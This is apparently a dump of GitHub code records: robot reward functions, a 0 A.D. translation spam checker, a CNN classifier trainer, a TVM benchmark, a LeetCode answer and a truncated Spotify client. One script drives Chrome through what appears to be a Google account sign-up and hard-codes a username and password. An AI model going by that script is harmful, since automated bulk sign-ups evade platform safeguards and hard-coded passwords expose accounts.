pose_err = np.sum(pose_diff)\n r_pose = np.exp(-0.6 * pose_err)\n\n # pose velocity reward\n tar_vel = 0.0\n joint_vel = Robot.get_joint_qvel()\n vel_diff = tar_vel - joint_vel\n vel_diff = vel_diff * vel_diff\n vel_err = np.sum(vel_diff)\n r_vel = np.exp(-0.02 * vel_err)\n\n r_stand = 0.2 * r_height + 0.6 * r_pose + 0.2 * r_vel\n\n return r_stand, r_height, r_pose, r_vel\n \n def render_scene_callback(self, task : JoystickPolicyDMControlTask, physics : EnginePhysics, scene : mujoco.MjvScene) -> None:\n robot_loc = task.robot.get_3d_location()\n sphere_loc = robot_loc.copy()\n sphere_loc[2] = self.standup_height\n #add_sphere_to_mjv_scene(scene, sphere_loc, 0.1, np.array([1.0, 0.0, 0.0, 1.0]))\n add_arrow_to_mjv_scene(scene, robot_loc, sphere_loc, 0.01, np.array([1.0, 0.0, 0.0, 1.0]))\n\n \n def step_reward(\n self, \n Robot: RailSimWalkerDMControl, \n action_target_qpos: np.ndarray,\n target_goal_world_delta: np.ndarray,\n target_goal_local: np.ndarray,\n target_yaw : float,\n target_delta_yaw: float, \n target_velocity: float,\n velocity_to_goal: float, \n change_in_abs_target_delta_yaw : 
float, \n target_custom_data: Optional[Any],\n enable_target_custom_obs : bool,\n info_dict: dict[str,Any],\n randomState: np.random.RandomState\n ) -> None:\n roll_w = stand_w = 0.5\n roll_threshold = np.cos(0.2 * np.pi)\n\n r_roll, root_cos_dist = self._calc_reward_roll(Robot)\n r_stand, r_height, r_pose, r_vel = self._calc_reward_stand(Robot)\n\n info_dict[\"reward_roll\"] = r_roll\n info_dict[\"reward_height\"] = r_height\n info_dict[\"reward_pose\"] = r_pose\n info_dict[\"reward_qvel\"] = r_vel\n info_dict[\"cos_dist\"] = root_cos_dist\n\n if root_cos_dist > roll_threshold:\n r_stand = r_stand\n else:\n r_stand = 0.0\n\n info_dict[\"reward_stand\"] = r_stand\n\n reward = roll_w * r_roll + stand_w * r_stand\n standing_reward = reward\n\n # Calculate Energy / Qvel Penalty\n qvel = Robot.get_joint_qvel()\n torque = Robot.get_joint_torques()\n energy = np.sum(np.abs(qvel * torque))\n info_dict[\"energy\"] = energy\n \n if self.use_energy_penalty:\n energy_reward = - 0.02 * energy\n else:\n energy_reward = 0.0\n \n self._log_success_rate(\n info_dict,\n r_roll,\n r_height,\n r_pose\n )\n\n self.rew = standing_reward + energy_reward\n\n\nclass GatedResetRewardProvider(ResetRewardProvider):\n def step_reward(\n self, \n Robot: RailSimWalkerDMControl,\n action_target_qpos: np.ndarray, \n target_goal_world_delta: np.ndarray,\n target_goal_local: np.ndarray,\n target_yaw : float,\n target_delta_yaw: float, \n target_velocity: float,\n velocity_to_goal: float, \n change_in_abs_target_delta_yaw : float, \n target_custom_data: Optional[Any],\n enable_target_custom_obs : bool,\n info_dict: dict[str,Any],\n randomState: np.random.RandomState\n ) -> None:\n\n r_roll, root_cos_dist = self._calc_reward_roll(Robot)\n info_dict[\"reward_roll\"] = r_roll\n info_dict[\"cos_dist\"] = root_cos_dist\n\n r_stand, r_height, r_pose, r_vel = self._calc_reward_stand(Robot)\n\n info_dict[\"reward_roll\"] = r_roll\n info_dict[\"reward_height\"] = r_height\n info_dict[\"reward_pose\"] = r_pose\n info_dict[\"reward_qvel\"] = r_vel\n info_dict[\"cos_dist\"] = root_cos_dist\n\n # Calculate Energy / Qvel Penalty\n qvel = Robot.get_joint_qvel()\n torque = Robot.get_joint_torques()\n energy = np.sum(np.abs(qvel * torque))\n info_dict[\"energy\"] = energy\n \n if self.use_energy_penalty:\n energy_reward = - 0.02 * energy\n else:\n energy_reward = 0.0\n\n self._log_success_rate(\n info_dict,\n r_roll,\n r_height,\n r_pose\n )\n\n self.rew = (r_roll * (1 + r_stand) + energy_reward) / 2.0\n","repo_name":"realquantumcookie/APRL","sub_path":"rail_walker_gym/joystick_policy_mujoco/reward_providers_sim.py","file_name":"reward_providers_sim.py","file_ext":"py","file_size_in_byte":8203,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"31"} +{"seq_id":"19513236464","text":"import sys, os, re, multiprocessing\n\nfrom i18n_helper import l10nFolderName, projectRootDirectory\nfrom i18n_helper.catalog import Catalog\nfrom i18n_helper.globber import getCatalogs\n\nVERBOSE = 0\n\n\nclass MessageChecker:\n \"\"\"Checks all messages in a catalog against a regex.\"\"\"\n def __init__(self, human_name, regex):\n self.regex = re.compile(regex, re.IGNORECASE)\n self.human_name = human_name\n\n def check(self, inputFilePath, templateMessage, translatedCatalogs):\n patterns = set(self.regex.findall(\n templateMessage.id[0] if templateMessage.pluralizable else templateMessage.id\n ))\n\n # As a sanity check, verify that the template message is coherent.\n # Note that these tend to be false positives.\n # 
TODO: the possible tags are usually comments, we ought to be able to find them.\n        if templateMessage.pluralizable:\n            pluralUrls = set(self.regex.findall(templateMessage.id[1]))\n            if pluralUrls.difference(patterns):\n                print(f\"{inputFilePath} - Different {self.human_name} in singular and plural source strings \"\n                      f\"for '{templateMessage}' in '{inputFilePath}'\")\n\n        for translationCatalog in translatedCatalogs:\n            translationMessage = translationCatalog.get(\n                templateMessage.id, templateMessage.context)\n            if not translationMessage:\n                continue\n\n            translatedPatterns = set(self.regex.findall(\n                translationMessage.string[0] if translationMessage.pluralizable else translationMessage.string\n            ))\n            unknown_patterns = translatedPatterns.difference(patterns)\n            if unknown_patterns:\n                print(f'{inputFilePath} - {translationCatalog.locale}: '\n                      f'Found unknown {self.human_name} {\", \".join([\"`\" + x + \"`\" for x in unknown_patterns])} in the translation '\n                      f'which do not match any of the URLs in the template: {\", \".join([\"`\" + x + \"`\" for x in patterns])}')\n\n            if templateMessage.pluralizable and translationMessage.pluralizable:\n                for indx, val in enumerate(translationMessage.string):\n                    if indx == 0:\n                        continue\n                    translatedPatternsMulti = set(self.regex.findall(val))\n                    unknown_patterns_multi = translatedPatternsMulti.difference(pluralUrls)\n                    if unknown_patterns_multi:\n                        print(f'{inputFilePath} - {translationCatalog.locale}: '\n                              f'Found unknown {self.human_name} {\", \".join([\"`\" + x + \"`\" for x in unknown_patterns_multi])} in the pluralised translation '\n                              f'which do not match any of the URLs in the template: {\", \".join([\"`\" + x + \"`\" for x in pluralUrls])}')\n\ndef check_translations(inputFilePath):\n    if VERBOSE:\n        print(f\"Checking {inputFilePath}\")\n    templateCatalog = Catalog.readFrom(inputFilePath)\n\n    # If language codes were specified on the command line, filter by those.\n    filters = sys.argv[1:]\n\n    # Load existing translation catalogs.\n    existingTranslationCatalogs = getCatalogs(inputFilePath, filters)\n\n    spam = MessageChecker(\"url\", r\"https?://(?:[a-z0-9-_$@./&+]|(?:%[0-9a-fA-F][0-9a-fA-F]))+\")\n    sprintf = MessageChecker(\"sprintf\", r\"%\\([^)]+\\)s\")\n    tags = MessageChecker(\"tag\", r\"[^\\\\][^\\\\](\\[[^]]+/?\\])\")\n\n    # Check that there are no spam URLs.\n    # Loop through all messages in the .POT catalog for URLs.\n    # For each, check for the corresponding key in the .PO catalogs.\n    # If found, check that URLs in the .PO keys are the same as those in the .POT key.\n    for templateMessage in templateCatalog:\n        spam.check(inputFilePath, templateMessage, existingTranslationCatalogs)\n        sprintf.check(inputFilePath, templateMessage, existingTranslationCatalogs)\n        tags.check(inputFilePath, templateMessage, existingTranslationCatalogs)\n\n    if VERBOSE:\n        print(f\"Done checking {inputFilePath}\")\n\n\ndef main():\n    print(\"\\n\\tWARNING: Remember to regenerate the POT files with “updateTemplates.py” \"\n          \"before you run this script.\\n\\tPOT files are not in the repository.\\n\")\n    foundPots = 0\n    for root, folders, filenames in os.walk(projectRootDirectory):\n        for filename in filenames:\n            if len(filename) > 4 and filename[-4:] == \".pot\" and os.path.basename(root) == l10nFolderName:\n                foundPots += 1\n                multiprocessing.Process(\n                    target=check_translations,\n                    args=(os.path.join(root, filename), )\n                ).start()\n    if foundPots == 0:\n        print(\n            \"This script did not work because no '.pot' files were found. 
\"\n \"Please run 'updateTemplates.py' to generate the '.pot' files, \"\n \"and run 'pullTranslations.py' to pull the latest translations from Transifex. \"\n \"Then you can run this script to check for spam in translations.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"0ad/0ad","sub_path":"source/tools/i18n/checkTranslations.py","file_name":"checkTranslations.py","file_ext":"py","file_size_in_byte":5071,"program_lang":"python","lang":"en","doc_type":"code","stars":2526,"dataset":"github-code","pt":"31"} +{"seq_id":"33119181059","text":"from model import CNN\nimport utils\nimport os\n\nfrom torch.autograd import Variable\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nfrom torch.utils.tensorboard import SummaryWriter\n\ntb_writer = SummaryWriter(log_dir=\"logs\")\n\nfrom sklearn.utils import shuffle\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score\nfrom gensim.models.keyedvectors import KeyedVectors\nimport numpy as np\nimport argparse\nimport copy\n\n\ndef train(data, params, global_step):\n if params[\"MODEL\"] != \"rand\":\n # load word2vec\n print(\"loading word2vec...\")\n if os.path.exists(\"glove.txt\"):\n print(\"load glove.txt\")\n word_vectors = KeyedVectors.load_word2vec_format(\"glove.txt\")\n else:\n word_vectors = KeyedVectors.load_word2vec_format(params[\"W2V_PATH\"])\n\n words = {}\n w_in_w2v = 0\n wv_matrix = []\n for i in range(len(data[\"vocab\"])):\n word = data[\"idx_to_word\"][i]\n if word in word_vectors.vocab:\n wv_matrix.append(word_vectors.word_vec(word))\n words[word] = word_vectors.word_vec(word)\n w_in_w2v += 1\n else:\n wv_matrix.append(np.random.uniform(-0.01, 0.01, 300).astype(\"float32\"))\n\n # vocab_num:13802, in w2v: 6506, ratio:0.4713809592812636\n print(\"vocab_num:{}, in w2v: {}, ratio:{}\".format(len(data[\"vocab\"]), w_in_w2v,\n float(w_in_w2v) / len(data[\"vocab\"])))\n\n if not os.path.exists(\"glove.txt\"):\n print(\"write glove vector to glove.txt\")\n with open(\"glove.txt\", \"w\", encoding=\"utf-8\") as f:\n f.write(str(len(words)) + \" 300\\n\")\n for word in words:\n f.write(\"{} {}\\n\".format(word, \" \".join(\"%s\" % v for v in words[word])))\n\n # one for UNK and one for zero padding\n wv_matrix.append(np.random.uniform(-0.01, 0.01, 300).astype(\"float32\"))\n wv_matrix.append(np.zeros(300).astype(\"float32\"))\n wv_matrix = np.array(wv_matrix)\n params[\"WV_MATRIX\"] = wv_matrix\n\n model = CNN(**params).cuda(params[\"GPU\"])\n\n parameters = filter(lambda p: p.requires_grad, model.parameters())\n optimizer = optim.Adadelta(parameters, params[\"LEARNING_RATE\"])\n criterion = nn.CrossEntropyLoss()\n\n max_dev_res = {\"weighted_f1\": 0}\n max_test_res = {}\n max_train_res = {}\n max_epoch = 0\n best_cnt = 0\n for e in range(params[\"EPOCH\"]):\n data[\"train_x\"], data[\"train_y\"] = shuffle(data[\"train_x\"], data[\"train_y\"])\n\n for i in range(0, len(data[\"train_x\"]), params[\"BATCH_SIZE\"]):\n global_step += 1\n batch_range = min(params[\"BATCH_SIZE\"], len(data[\"train_x\"]) - i)\n\n batch_x = [[data[\"word_to_idx\"][w] for w in sent] +\n [params[\"VOCAB_SIZE\"] + 1] * (params[\"MAX_SENT_LEN\"] - len(sent))\n for sent in data[\"train_x\"][i:i + batch_range]]\n batch_y = [data[\"classes\"].index(c) for c in data[\"train_y\"][i:i + batch_range]]\n\n batch_x = Variable(torch.LongTensor(batch_x)).cuda(params[\"GPU\"])\n batch_y = Variable(torch.LongTensor(batch_y)).cuda(params[\"GPU\"])\n\n optimizer.zero_grad()\n model.train()\n pred = model(batch_x)\n loss = 
criterion(pred, batch_y)\n loss.backward()\n nn.utils.clip_grad_norm(parameters, max_norm=params[\"NORM_LIMIT\"])\n optimizer.step()\n print(\"global_step: %d, epoch: %d, loss: %f\" % (global_step, e + 1, loss.item()))\n tb_writer.add_scalar('loss', loss.item(), global_step)\n\n print(\"epoch:\", e + 1)\n train_res = test(data, model, params, \"train\", global_step)\n dev_res = test(data, model, params, \"dev\", global_step)\n test_res = test(data, model, params, \"test\", global_step)\n # print(\"epoch:\", e + 1, \"/ train_res:\", train_res, \"/ dev_res:\", dev_res, \"/ test_res:\", test_res)\n\n if dev_res[\"weighted_f1\"] > max_dev_res[\"weighted_f1\"]:\n max_train_res = train_res\n max_dev_res = dev_res\n max_test_res = test_res\n max_epoch = e + 1\n print(\"New best model!\")\n if params[\"SAVE_MODEL\"]:\n best_model = copy.deepcopy(model)\n\n if params[\"EARLY_STOPPING\"] and dev_res[\"weighted_f1\"] <= max_dev_res[\"weighted_f1\"]:\n best_cnt += 1\n if best_cnt >= 3:\n print(\"early stopping by dev_weighted_f1!\")\n break\n else:\n best_cnt = 0\n\n print(\"BEST MODEL epoch: \" + str(max_epoch))\n print(\"train\\t\" + \" \".join([\"%s: %.4f\" % (k, max_train_res[k]) for k in max_train_res]))\n print(\"dev\\t\" + \" \".join([\"%s: %.4f\" % (k, max_dev_res[k]) for k in max_dev_res]))\n print(\"test\\t\" + \" \".join([\"%s: %.4f\" % (k, max_test_res[k]) for k in max_test_res]))\n if params[\"SAVE_MODEL\"]:\n utils.save_model(best_model, params)\n return global_step, max_train_res, max_dev_res, max_test_res, max_epoch\n\n\ndef test(data, model, params, mode, global_step):\n model.eval()\n\n if mode == \"dev\":\n x, y = data[\"dev_x\"], data[\"dev_y\"]\n elif mode == \"test\":\n x, y = data[\"test_x\"], data[\"test_y\"]\n elif mode == \"train\":\n x, y = data[\"train_x\"], data[\"train_y\"]\n\n x = [[data[\"word_to_idx\"][w] if w in data[\"vocab\"] else params[\"VOCAB_SIZE\"] for w in sent] +\n [params[\"VOCAB_SIZE\"] + 1] * (params[\"MAX_SENT_LEN\"] - len(sent))\n for sent in x]\n\n x = Variable(torch.LongTensor(x)).cuda(params[\"GPU\"])\n y = [data[\"classes\"].index(c) for c in y]\n\n pred = np.argmax(model(x).cpu().data.numpy(), axis=1)\n # acc = sum([1 if p == y else 0 for p, y in zip(pred, y)]) / len(pred)\n res = {}\n res[\"acc\"] = accuracy_score(y, pred)\n res[\"macro_p\"] = precision_score(y, pred, average=\"macro\")\n res[\"macro_r\"] = recall_score(y, pred, average=\"macro\")\n res[\"macro_f1\"] = f1_score(y, pred, average=\"macro\")\n res[\"micro_p\"] = precision_score(y, pred, average=\"micro\")\n res[\"micro_r\"] = recall_score(y, pred, average=\"micro\")\n res[\"micro_f1\"] = f1_score(y, pred, average=\"micro\")\n res[\"weighted_f1\"] = f1_score(y, pred, average=\"weighted\")\n print(\n \"{}\\tacc: {:.4f}\\tmacro: p {:.4f}, r {:.4f}, f1: {:.4f}\\tmicro: p {:.4f}, r {:.4f}, f1 {:.4f}\\tweighted_f1:{:.4f}\".format(\n mode, res[\"acc\"], res[\"macro_p\"], res[\"macro_r\"], res[\"macro_f1\"], res[\"micro_p\"], res[\"micro_r\"],\n res[\"micro_f1\"], res[\"weighted_f1\"]))\n for k in res:\n tb_writer.add_scalar(mode + \"_\" + k, res[k], global_step)\n return res\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"-----[CNN-classifier]-----\")\n parser.add_argument(\"--mode\", default=\"train\", help=\"train: train (with test) a model / test: test saved models\")\n parser.add_argument(\"--model\", default=\"non-static\",\n help=\"available models: rand, static, non-static, multichannel\")\n parser.add_argument(\"--dataset\", default=\"MELD\", help=\"available 
datasets: MR, TREC, MELD\")\n parser.add_argument(\"--save_model\", default=False, action='store_true', help=\"whether saving model or not\")\n parser.add_argument(\"--early_stopping\", default=False, action='store_true', help=\"whether to apply early stopping\")\n parser.add_argument(\"--epoch\", default=200, type=int, help=\"number of max epoch\")\n parser.add_argument(\"--learning_rate\", default=0.1, type=float, help=\"learning rate\")\n parser.add_argument(\"--gpu\", default=9, type=int, help=\"the number of gpu to be used\")\n parser.add_argument(\"--w2v_path\", default=\"/users5/yjtian/Downloads/glove.840B.300d.w2v.txt\",\n help=\"word2vec file path\")\n\n options = parser.parse_args()\n data = getattr(utils, f\"read_{options.dataset}\")()\n\n data[\"vocab\"] = sorted(list(set([w for sent in data[\"train_x\"] + data[\"dev_x\"] + data[\"test_x\"] for w in sent])))\n data[\"classes\"] = sorted(list(set(data[\"train_y\"])))\n data[\"word_to_idx\"] = {w: i for i, w in enumerate(data[\"vocab\"])}\n data[\"idx_to_word\"] = {i: w for i, w in enumerate(data[\"vocab\"])}\n\n params = {\n \"MODEL\": options.model,\n \"DATASET\": options.dataset,\n \"SAVE_MODEL\": options.save_model,\n \"EARLY_STOPPING\": options.early_stopping,\n \"EPOCH\": options.epoch,\n \"LEARNING_RATE\": options.learning_rate,\n \"MAX_SENT_LEN\": max([len(sent) for sent in data[\"train_x\"] + data[\"dev_x\"] + data[\"test_x\"]]),\n \"BATCH_SIZE\": 256,\n \"WORD_DIM\": 300,\n \"VOCAB_SIZE\": len(data[\"vocab\"]),\n \"CLASS_SIZE\": len(data[\"classes\"]),\n \"FILTERS\": [3, 4, 5],\n \"FILTER_NUM\": [50, 50, 50],\n \"DROPOUT_PROB\": 0.5,\n \"NORM_LIMIT\": 3,\n \"GPU\": options.gpu,\n \"W2V_PATH\": options.w2v_path\n }\n\n print(\"=\" * 20 + \"INFORMATION\" + \"=\" * 20)\n print(\"MODEL:\", params[\"MODEL\"])\n print(\"DATASET:\", params[\"DATASET\"])\n print(\"VOCAB_SIZE:\", params[\"VOCAB_SIZE\"])\n print(\"EPOCH:\", params[\"EPOCH\"])\n print(\"LEARNING_RATE:\", params[\"LEARNING_RATE\"])\n print(\"EARLY_STOPPING:\", params[\"EARLY_STOPPING\"])\n print(\"SAVE_MODEL:\", params[\"SAVE_MODEL\"])\n print(\"MAX_SENT_LEN:\", params[\"MAX_SENT_LEN\"])\n print(\"CLASS_SIZE:\", params[\"CLASS_SIZE\"])\n print(\"FILTERS:\", params[\"FILTERS\"])\n print(\"FILTER_NUM:\", params[\"FILTER_NUM\"])\n print(\"=\" * 20 + \"INFORMATION\" + \"=\" * 20)\n\n if options.mode == \"train\":\n print(\"=\" * 20 + \"TRAINING STARTED\" + \"=\" * 20)\n v = [\"acc\", \"macro_f1\", \"micro_f1\", \"weighted_f1\"]\n iter = 5\n test_w_f1 = 0.0\n best_epoch = []\n global_step = 0\n with open(\"res.csv\", \"w\", encoding=\"utf-8\") as f:\n f.write(\"id,\" + \",\".join(\n [\"train_%s\" % s for s in v] + [\"dev_%s\" % s for s in v] + [\"test_%s\" % s for s in v]) + \"\\n\")\n # f.write(\"id,acc,macro_f1,micro_f1,weighted_f1\\n\")\n for i in range(1, 1 + iter):\n print(\"=\" * 10 + \"ROUND \" + str(i) + \"=\" * 10)\n global_step, max_train_res, max_dev_res, max_test_res, max_epoch = train(data, params, global_step)\n test_w_f1 += max_test_res[\"weighted_f1\"]\n best_epoch.append(max_epoch)\n f.write(str(i) + \",\" + \",\".join([\"%f\" % max_train_res[k] for k in max_train_res if k in v]))\n f.write(\",\" + \",\".join([\"%f\" % max_dev_res[k] for k in max_dev_res if k in v]))\n f.write(\",\" + \",\".join([\"%f\" % max_test_res[k] for k in max_test_res if k in v]) + \"\\n\")\n # f.write(str(i) + \",\" + \",\".join([\"%f\" % max_test_res[k] for k in max_test_res if k in v]) + \"\\n\")\n print(\"=\" * 20 + \"TRAINING FINISHED\" + \"=\" * 20)\n test_w_f1 = test_w_f1 
/ iter\n            print(\"best epoch: %s, avg test weighted f1: %f\" % (str(best_epoch), test_w_f1))\n            tb_writer.add_scalar('avg_test_w_f1', test_w_f1, global_step)\n        tb_writer.close()\n    else:\n        model = utils.load_model(params).cuda(params[\"GPU\"])\n\n        test_res = test(data, model, params, \"test\", 0)\n        print(\"test acc:\", test_res[\"acc\"])\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Tianyijian/CNN","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":11225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"26209028525","text":"from pyautogui import *\nimport pyautogui\nimport time\nimport win32api, win32con\nfrom AppOpener import open\nimport random\n\nopen(\"Google Chrome\")\ntime.sleep(0.2)\n\n#!= 255 or pyautogui.pixel(17,1007) [0] != 201 or pyautogui.pixel(17,1007) [1] != 100 or pyautogui.pixel(17,1007) [2] != 89\n\nif pyautogui.pixel(1886,1000) [0] != 255 or pyautogui.pixel(1886,1000) [1] != 255 or pyautogui.pixel(1886,1000) [2] != 255:\n\tpyautogui.keyDown('win')\n\tpyautogui.keyDown('up')\n\ttime.sleep(0.1)\n\tpyautogui.keyUp('win')\n\tpyautogui.keyUp('up')\n\tsleep(0.1)\n \ndef press(x,y):\n\twin32api.SetCursorPos((x,y))\n\twin32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,0,0)\n\ttime.sleep(0.1)\n\twin32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,0,0)\n\ttime.sleep(0.5)\n \ndef type(text):\n\tfor i in range(len(text)):\n\t\tpyautogui.keyDown(text[i])\n\t\ttime.sleep(0.01)\n\t\tpyautogui.keyUp(text[i])\n\ntype('https://support.google.com/accounts/answer/27441?hl=en')\n\npyautogui.keyDown('Enter')\npyautogui.keyUp('Enter')\ntime.sleep(2)\n\npress(250,580)\n\ntime.sleep(0.5)\ntype('Kalacskepu')\n\npress(1100,666)\n\ntime.sleep(0.1)\npress(820,540)\n\ntime.sleep(0.5)\ntype('1')\n\npress(930,540)\n\npress(930,570)\n\npress(1100,550)\n\ntype('2000')\n\npress(800,600)\n\npress(800,666)\n\npress(1100,700)\n\npress(780,610)\n\nwin32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,0,0)\ntime.sleep(0.1)\nwin32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,0,0)\n\ntype('Kalacskepu0001')\n\npress(970,725)\n\ntype('Jelszo01')\npyautogui.keyDown('Enter')\npyautogui.keyUp('Enter')\n\ntype('Jelszo01')\npyautogui.keyDown('Enter')\npyautogui.keyUp('Enter')\n\n\n","repo_name":"TucsokSk1lll/Python","sub_path":"Bot_test.py","file_name":"Bot_test.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73808665048","text":"import tvm\nfrom tvm import relay\nimport time\nimport numpy as np\nimport torch\nimport torchvision\n\ntorch.backends.cudnn.benchmark = True\n'''\n'AlexNet', 'DenseNet', 'GoogLeNet', 'GoogLeNetOutputs', \n'Inception3', 'InceptionOutputs', 'MNASNet', 'MobileNetV2', \n'MobileNetV3', 'ResNet', 'ShuffleNetV2', 'SqueezeNet', 'VGG', \n'_GoogLeNetOutputs', '_InceptionOutputs', '__builtins__', \n'__cached__', '__doc__', '__file__', '__loader__', '__name__', \n'__package__', '__path__', '__spec__', '_utils', 'alexnet', 'densenet', \n'densenet121', 'densenet161', 'densenet169', 'densenet201', 'detection', \n'googlenet', 'inception', 'inception_v3', 'mnasnet', 'mnasnet0_5', 'mnasnet0_75', \n'mnasnet1_0', 'mnasnet1_3', 'mobilenet', 'mobilenet_v2', 'mobilenet_v3_large',\n 'mobilenet_v3_small', 'mobilenetv2', 'mobilenetv3', 'quantization', 'resnet', \n 'resnet101', 'resnet152', 'resnet18', 'resnet34', 'resnet50', 'resnext101_32x8d',\n 'resnext50_32x4d', 'segmentation', 'shufflenet_v2_x0_5', 'shufflenet_v2_x1_0', \n
 'shufflenet_v2_x1_5', 'shufflenet_v2_x2_0', 'shufflenetv2', 'squeezenet', 'squeezenet1_0', \n 'squeezenet1_1', 'utils', 'vgg', 'vgg11', 'vgg11_bn', 'vgg13', 'vgg13_bn', 'vgg16', 'vgg16_bn',\n 'vgg19', 'vgg19_bn', 'video', 'wide_resnet101_2', 'wide_resnet50_2']\n'''\n\n# model_name = \"resnet18\"\nmodel_name = \"resnet18\"\nmodel = getattr(torchvision.models, model_name)(pretrained=False)\nmodel = model.eval()\n# We grab the TorchScripted model via tracing\ninput_shape = [1, 3, 224, 224]\ninput_data = torch.randn(input_shape).cuda()\nmodel = model.cuda()\nscripted_model = torch.jit.trace(model, input_data).eval()\n\n\n# warm-up\nfor i in range(50):\n    output = model(input_data)\n\n\navg_fwd_time = 0\nfor i in range(50):\n    torch.cuda.synchronize()\n    start = time.time()\n    output = model(input_data)\n    torch.cuda.synchronize()\n    end = time.time()\n    fwd_time = end - start\n    avg_fwd_time += fwd_time\navg_fwd_time = avg_fwd_time * 1000 / 50\nprint(\"time cost for torch-cudnn-fp32: %.5f\" % avg_fwd_time,\"ms\")\n\n\ninput_data = input_data.half()\nmodel = model.half()\nmodel.eval()\n\nfor i in range(50):\n    output = model(input_data)\n\navg_fwd_time = 0\nfor i in range(50):\n    torch.cuda.synchronize()\n    start = time.time()\n    output = model(input_data)\n    torch.cuda.synchronize()\n    end = time.time()\n    fwd_time = end - start\n    avg_fwd_time += fwd_time\navg_fwd_time = avg_fwd_time * 1000 / 50\nprint(\"time cost for torch-cudnn-fp16: %.5f\" % avg_fwd_time,\"ms\")\n\nstart = time.time()\nfor i in range(100):\n    output = scripted_model(input_data)\n    # output = model(input_data)\n\n\nprint(\"time cost for pytorch jit:\", (time.time() - start) * 1000/100,\"ms\")\n\n# # import pdb;pdb.set_trace()\n# mod, params = relay.frontend.from_pytorch(scripted_model, [('input', input_shape)])\n\n# # target = tvm.target.Target(\"llvm\", host=\"llvm\")\n# dev = tvm.cuda(0)\n# with tvm.transform.PassContext(opt_level=3):\n#     # lib = relay.build(mod, target=\"cuda -libs=cudnn\", params=params)\n#     lib = relay.build(mod, target=\"cuda\", params=params)\n\n\n\n# from tvm.contrib import graph_executor\n# dtype = \"float32\"\n# m = graph_executor.GraphModule(lib[\"default\"](dev))\n# # Set inputs\n# data_tvm = tvm.nd.array((np.random.uniform(size=input_shape)).astype(dtype))\n# m.set_input('input', tvm.nd.array(data_tvm))\n# # Execute\n# for i in range(50):\n#     m.run()\n# start = time.time()\n# for i in range(10):\n#     m.run()\n# end = time.time()\n# print(\"time cost for tvm-cudnn: \", (end - start) * 1000/10,\"ms\")\n# # Get outputs\n# tvm_output = m.get_output(0)\n\n\n\n","repo_name":"ybai62868/MixPrecisionTensorCore","sub_path":"tvm_cudnn/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"70027601050","text":"# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\nclass Solution:\n    def middleNode(self, head: Optional[ListNode]) -> Optional[ListNode]:\n        temp = head\n        count=0\n        while temp:\n            temp=temp.next\n            count+=1\n        count//=2\n        temp = head\n        while count!=0:\n            temp=temp.next\n            count-=1\n        return temp\n","repo_name":"chandansgowda/leetcode-python","sub_path":"501-1000/876.py","file_name":"876.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"32551133838","text":"import 
os\nimport json\nimport requests\nimport numpy as np\nimport pandas as pd\nimport urllib.parse as urlparse\n\nfrom multiprocessing import Pool\nfrom functools import partial\nfrom base64 import b64encode\nfrom urllib.parse import urlencode\nfrom loguru import logger\n\n\ndef get_token():\n data = {\n \"client_id\": os.getenv(\"client_id\"),\n \"client_secret\": os.getenv(\"client_secret\"),\n }\n encoded_credentials = b64encode(\n f\"{data['client_id']}:{data['client_secret']}\".encode(\"ascii\")\n ).decode(\"utf-8\")\n headers = {\"Authorization\": f\"Basic {encoded_credentials}\"}\n return json.loads(\n requests.post(\n \"https://accounts.spotify.com/api/token\",\n headers=headers,\n data={\"grant_type\": \"client_credentials\"},\n ).text\n )\n\n\ndef make_request(route, params={}, token=None):\n if not token:\n token = get_token()\n headers = {\"Authorization\": f\"{token['token_type']} {token['access_token']}\"}\n\n # adding query params\n url_parse = urlparse.urlparse(route)\n query_dict = dict(urlparse.parse_qsl(url_parse.query))\n query_dict.update(params)\n query_dict = urlparse.urlencode(query_dict)\n route = urlparse.urlunparse(url_parse._replace(query=query_dict))\n\n logger.debug(f\"Request {route}\")\n\n return requests.get(route, headers=headers)\n\n\ndef get_palylist(playlist_id, **kwargs):\n request_url = f\"https://api.spotify.com/v1/playlists/{playlist_id}/tracks\"\n response = json.loads(make_request(request_url, params=kwargs).text)\n results = response.get(\"items\", [])\n while response.get(\"next\"):\n response = json.loads(make_request(response.get(\"next\"), params={}).text)\n results.extend(response.get(\"items\", []))\n return results\n\n\ndef select_elements(record):\n return {\n \"user\": record.get(\"added_by\", {}).get(\"uri\"),\n \"track_name\": record.get(\"track\", {}).get(\"name\"),\n \"track_id\": record.get(\"track\", {}).get(\"id\"),\n \"artists\": list(\n map(\n lambda x: {\"name\": x[\"name\"], \"artist_id\": x[\"id\"]},\n record.get(\"track\", {}).get(\"artists\", []),\n )\n ),\n \"album_id\": record.get(\"track\", {}).get(\"album\", {}).get(\"id\"),\n \"album_name\": record.get(\"track\", {}).get(\"album\", {}).get(\"name\"),\n }\n\n\ndef get_track_info(track_id):\n request_url = f\"https://api.spotify.com/v1/tracks/{track_id}\"\n response = make_request(request_url)\n response = json.loads(response.text)\n return {\"popularity\": response.get(\"popularity\")}\n\n\ndef get_album_genre(album_id):\n request_url = f\"https://api.spotify.com/v1/albums/{album_id}\"\n response = make_request(request_url)\n response = json.loads(response.text)\n return response.get(\"genres\", [])\n\n\ndef get_genre_by_artist(row, **kwargs):\n genres = []\n if not isinstance(row, str):\n for artist in row.get(\"artists\", []):\n request_url = f\"https://api.spotify.com/v1/artists/{artist['artist_id']}\"\n genres.extend(\n json.loads(make_request(request_url, 